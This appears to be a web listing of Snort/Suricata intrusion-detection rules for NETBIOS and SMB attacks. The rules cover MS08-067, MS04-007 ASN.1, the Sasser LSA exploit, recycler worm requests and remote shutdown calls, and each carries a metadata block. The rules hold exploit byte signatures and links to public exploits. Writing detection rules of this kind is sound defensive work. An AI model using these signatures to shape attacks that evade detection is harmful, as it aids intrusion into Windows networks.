alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (20)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 5C 00 2E 00 2E 00 5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008710; classtype:attempted-admin; sid:2008710; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (20)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008710

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008712

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (22)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|5C|..|5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008712; classtype:attempted-admin; sid:2008712; rev:6; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (22)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008712

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008713

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"/../"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008713; classtype:attempted-admin; sid:2008713; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (23)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008713

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008714

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (24)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 2F 00 2E 00 2E 00 2F|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008714; classtype:attempted-admin; sid:2008714; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (24)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008714

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008715

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 5C 00 2E 00 2E 00 5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008715; classtype:attempted-admin; sid:2008715; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (25)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008715

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008717

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (27)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"..|5C|..|5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008717; classtype:attempted-admin; sid:2008717; rev:6; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (27)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008717

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008718

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (28)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"../../"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008718; classtype:attempted-admin; sid:2008718; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (28)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008718

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008719

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (29)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 2F 00 2E 00 2E 00 2F|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008719; classtype:attempted-admin; sid:2008719; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (29)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008719

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008720

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (30)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 5C 00 2E 00 2E 00 5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008720; classtype:attempted-admin; sid:2008720; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (30)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008720

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008721

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2)"; flow:established,to_server; content:"|00 2e 00 2e 00 2f 00 2e 00 2e 00 2f 00 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 87|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008721; classtype:attempted-admin; sid:2008721; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 — Known Exploit Instance (2)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008721

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2000017

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"ET NETBIOS NII Microsoft ASN.1 Library Buffer Overflow Exploit"; flow: to_server,established; content:"|A1 05 23 03 03 01 07|"; reference:url,www.microsoft.com/technet/security/bulletin/ms04-007.asp; reference:url,doc.emergingthreats.net/bin/view/Main/2000017; classtype:bad-unknown; sid:2000017; rev:6; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : NII Microsoft ASN.1 Library Buffer Overflow Exploit

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : bad-unknown

URL reference : url,www.microsoft.com/technet/security/bulletin/ms04-007.asp|url,doc.emergingthreats.net/bin/view/Main/2000017

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2000032

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS LSA exploit"; flow: to_server,established; content:"|313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131|"; offset: 78; depth: 192; reference:url,www.eeye.com/html/research/advisories/AD20040501.html; reference:url,www.upenn.edu/computing/virus/04/w32.sasser.worm.html; reference:url,doc.emergingthreats.net/bin/view/Main/2000032; classtype:misc-activity; sid:2000032; rev:9; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : LSA exploit

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-activity

URL reference : url,www.eeye.com/html/research/advisories/AD20040501.html|url,www.upenn.edu/computing/virus/04/w32.sasser.worm.html|url,doc.emergingthreats.net/bin/view/Main/2000032

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2011526

#alert tcp any any -> $HOME_NET [139,445] (msg:"ET NETBIOS windows recycler request - suspicious"; flow:to_server,established; content:"|00 00 5C 00 72 00 65 00 63 00 79 00 63 00 6C 00 65 00 72 00 5C|"; reference:url,about-threats.trendmicro.com/ArchiveMalware.aspx?name=WORM_AUTORUN.ZBC; reference:url,www.symantec.com/connect/forums/virus-alert-crecyclers-1-5-21-1482476501-1644491937-682003330-1013svchostexe; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3AWin32%2FFakerecy.A; reference:url,support.microsoft.com/kb/971029; classtype:suspicious-filename-detect; sid:2011526; rev:1; metadata:created_at 2010_09_27, updated_at 2010_09_27;)

Name : windows recycler request — suspicious

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : suspicious-filename-detect

URL reference : url,about-threats.trendmicro.com/ArchiveMalware.aspx?name=WORM_AUTORUN.ZBC|url,www.symantec.com/connect/forums/virus-alert-crecyclers-1-5-21-1482476501-1644491937-682003330-1013svchostexe|url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3AWin32%2FFakerecy.A|url,support.microsoft.com/kb/971029

CVE reference : Not defined

Creation date : 2010-09-27

Last modified date : 2010-09-27

Rev version : 1

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2001944

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS MS04-007 Kill-Bill ASN1 exploit attempt"; flow: established,to_server; content:"CCCC|20f0fd7f|SVWf"; reference:url,www.phreedom.org/solar/exploits/msasn1-bitstring/; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; reference:cve,CAN-2003-0818; reference:url,doc.emergingthreats.net/bin/view/Main/2001944; classtype:attempted-admin; sid:2001944; rev:7; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : MS04-007 Kill-Bill ASN1 exploit attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.phreedom.org/solar/exploits/msasn1-bitstring/|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx|cve,CAN-2003-0818|url,doc.emergingthreats.net/bin/view/Main/2001944

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2011527

#alert tcp any any -> $HOME_NET [139,445] (msg:"ET NETBIOS windows recycler .exe request - suspicious"; flow:to_server,established; content:"|00 00 5C 00 72 00 65 00 63 00 79 00 63 00 6C 00 65 00 72 00 5C|"; content:"|00 2E 00 65 00 78 00 65|"; distance:0; reference:url,about-threats.trendmicro.com/ArchiveMalware.aspx?name=WORM_AUTORUN.ZBC; reference:url,www.symantec.com/connect/forums/virus-alert-crecyclers-1-5-21-1482476501-1644491937-682003330-1013svchostexe; classtype:suspicious-filename-detect; sid:2011527; rev:4; metadata:created_at 2010_09_27, updated_at 2010_09_27;)

Name : windows recycler .exe request — suspicious

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : suspicious-filename-detect

URL reference : url,about-threats.trendmicro.com/ArchiveMalware.aspx?name=WORM_AUTORUN.ZBC|url,www.symantec.com/connect/forums/virus-alert-crecyclers-1-5-21-1482476501-1644491937-682003330-1013svchostexe

CVE reference : Not defined

Creation date : 2010-09-27

Last modified date : 2010-09-27

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2012084

alert tcp $EXTERNAL_NET 445 -> $HOME_NET any (msg:"ET NETBIOS Microsoft Windows SMB Client Race Condition Remote Code Execution"; flow:to_client,established; content:"|ff 53 4d 42 72|"; offset:4; depth:5; content:"|00 00 00 00|"; distance:0; within:4; byte_test:4,<,4356,30,relative,little; reference:url,www.exploit-db.com/exploits/12258/; reference:cve,2010-0017; reference:bid,38100; reference:url,www.microsoft.com/technet/security/Bulletin/MS10-006.mspx; classtype:attempted-user; sid:2012084; rev:2; metadata:created_at 2010_12_22, updated_at 2010_12_22;)

Name : Microsoft Windows SMB Client Race Condition Remote Code Execution

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-user

URL reference : url,www.exploit-db.com/exploits/12258/|cve,2010-0017|bid,38100|url,www.microsoft.com/technet/security/Bulletin/MS10-006.mspx

CVE reference : Not defined

Creation date : 2010-12-22

Last modified date : 2010-12-22

Rev version : 2

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2012094

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS SMB Trans2 Query_Fs_Attribute_Info SrvSmbQueryFsInformation Pool Buffer Overflow"; flow:to_server,established; content:"|ff 53 4d 42 32|"; offset:4; depth:5; content:"|00 00 00 00|"; distance:0; within:4; content:"|00 00|"; distance:30; within:2; content:"|00 03 00|"; distance:19; within:3; reference:url,www.exploit-db.com/exploits/14607/; reference:url,seclists.org/fulldisclosure/2010/Aug/122; reference:cve,2010-2550; reference:bid,42224; reference:url,www.microsoft.com/technet/security/Bulletin/MS10-054.mspx; classtype:attempted-user; sid:2012094; rev:2; metadata:created_at 2010_12_23, updated_at 2010_12_23;)

Name : SMB Trans2 Query_Fs_Attribute_Info SrvSmbQueryFsInformation Pool Buffer Overflow

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-user

URL reference : url,www.exploit-db.com/exploits/14607/|url,seclists.org/fulldisclosure/2010/Aug/122|cve,2010-2550|bid,42224|url,www.microsoft.com/technet/security/Bulletin/MS10-054.mspx

CVE reference : Not defined

Creation date : 2010-12-23

Last modified date : 2010-12-23

Rev version : 2

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2012317

alert udp $EXTERNAL_NET any -> $HOME_NET [137,138,139,445] (msg:"ET NETBIOS Microsoft Windows Server 2003 Active Directory Pre-Auth BROWSER ELECTION Heap Overflow Attempt"; content:"|42 4F 00|"; content:"BROWSER"; nocase; distance:0; content:"|08 09 A8 0F 01 20|"; fast_pattern; distance:0; isdataat:65,relative; content:!"|0A|"; within:65; reference:url,tools.cisco.com/security/center/viewAlert.x?alertId=22457; reference:bid,46360; classtype:attempted-admin; sid:2012317; rev:2; metadata:created_at 2011_02_17, updated_at 2011_02_17;)

Name : Microsoft Windows Server 2003 Active Directory Pre-Auth BROWSER ELECTION Heap Overflow Attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,tools.cisco.com/security/center/viewAlert.x?alertId=22457|bid,46360

CVE reference : Not defined

Creation date : 2011-02-17

Last modified date : 2011-02-17

Rev version : 2

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102480

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS InitiateSystemShutdown unicode attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 18|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102480; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS InitiateSystemShutdown unicode attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102481

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS InitiateSystemShutdown unicode little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|18 00|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102481; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS InitiateSystemShutdown unicode little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102482

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS InitiateSystemShutdown attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 18|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102482; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS InitiateSystemShutdown attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102483

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS InitiateSystemShutdown little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|18 00|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102483; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS InitiateSystemShutdown little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102479

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; classtype:protocol-command-decode; sid:2102479; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102478

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; classtype:protocol-command-decode; sid:2102478; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102477

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|5C 00|w|00|i|00|n|00|r|00|e|00|g|00 00 00|"; within:16; distance:78; nocase; flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102477; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg unicode create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102476

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|5C|winreg|00|"; within:8; distance:78; nocase; flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102476; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102472

